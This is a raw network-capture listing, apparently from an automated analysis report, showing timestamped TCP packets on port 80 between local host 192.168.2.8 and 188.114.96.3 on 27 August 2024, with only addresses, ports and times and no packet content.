                                Aug 27, 2024 09:49:38.446253061 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.446393013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446404934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446415901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446453094 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.446490049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446502924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446513891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446526051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446531057 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.446538925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446588039 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.446613073 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.446635962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446647882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446660042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446671009 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446686029 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.446743965 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.446775913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446787119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446799994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446813107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446824074 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.446850061 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.446923971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446934938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446945906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446957111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446965933 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.446968079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.446980000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447009087 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.447031021 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.447110891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447122097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447133064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447144985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447160959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447177887 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.447179079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447253942 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.447272062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447283983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447302103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447314024 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447324991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447338104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447349072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447362900 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447376013 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.447376013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.447407007 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.449542046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449568987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449579954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449604034 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.449620008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.449654102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449666023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449677944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449712038 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.449763060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449774027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449784994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449800014 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.449826956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.449918032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449928999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449939966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449951887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449964046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449975014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449986935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.449991941 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.450012922 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.450050116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450122118 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.450154066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450165987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450182915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450193882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450202942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450211048 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.450217962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450229883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450231075 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.450241089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450252056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450258017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.450277090 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.450433016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450444937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450460911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450472116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450479031 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450485945 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.450515032 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.450568914 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.450720072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450731993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450742006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450752974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450763941 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450774908 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450783968 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.450783968 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.450786114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450803041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450814962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450820923 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.450825930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450838089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450849056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450861931 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.450875998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.450905085 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.451046944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451059103 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451070070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451081991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451097965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451103926 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.451127052 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.451183081 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.451208115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451219082 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451229095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451242924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451256037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451267958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451271057 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.451294899 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.451303959 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.451364994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451376915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451386929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451397896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451409101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451421976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451432943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451445103 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.451447964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451461077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451463938 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.451472998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451483965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451494932 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.451494932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451507092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451518059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451519012 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.451529026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.451533079 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.451560020 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.492355108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.533227921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533247948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533260107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533277035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533291101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533302069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533318043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533329964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533368111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533379078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533422947 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.533472061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533485889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533499002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533510923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533521891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533585072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533595085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533652067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533663034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533674002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533682108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.533685923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533771992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.533804893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533816099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533828020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533838034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533849001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533855915 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.533865929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533879995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.533879995 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.533915043 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.533941031 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.534136057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534152985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534164906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534174919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534187078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534198999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534209967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534221888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534224987 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.534238100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534248114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534255028 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.534277916 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.534418106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534429073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534440041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534452915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534455061 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.534462929 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.534467936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534480095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534492016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.534496069 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.534554005 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.536917925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.536930084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.536942005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.536969900 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.536981106 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.537029028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537040949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537051916 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537065983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537082911 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.537103891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.537178993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537189960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537199974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537211895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537224054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537230968 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.537235975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537246943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537259102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537261009 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.537271976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537292004 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.537306070 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.537458897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537470102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537480116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537492990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537502050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.537518978 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.537602901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537614107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537626028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537636995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537658930 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.537672997 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.537738085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537750959 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537761927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537775040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537779093 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.537786007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537798882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537801027 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.537811041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537825108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537825108 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.537836075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537847042 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.537861109 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.537889957 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.538069010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538079977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538089991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538116932 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.538130045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538131952 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.538146973 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538158894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538175106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538186073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538187027 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.538211107 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.538378954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538393974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538434029 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.538521051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538532019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538542032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538558006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538561106 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.538569927 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538580894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538584948 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.538593054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538604975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538616896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538628101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538636923 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.538639069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538650990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.538655996 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.538691044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.539232016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.539244890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.539257050 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.539290905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.539298058 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.539304018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.539304972 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.539314985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.539329052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.539340019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.539352894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.539364100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.539376020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.539391041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.539392948 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.539392948 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.539392948 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.539405107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.539423943 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.539463997 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.620043993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620120049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620130062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620187998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620187998 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.620198965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620210886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620223045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620224953 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.620255947 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.620301008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620347977 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.620392084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620476007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620491028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620502949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620515108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620520115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.620536089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620538950 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.620552063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620563984 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620574951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620584965 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.620587111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620603085 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.620630980 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:38.620637894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620723963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:38.620733976 CEST8049715188.114.96.3192.168.2.8
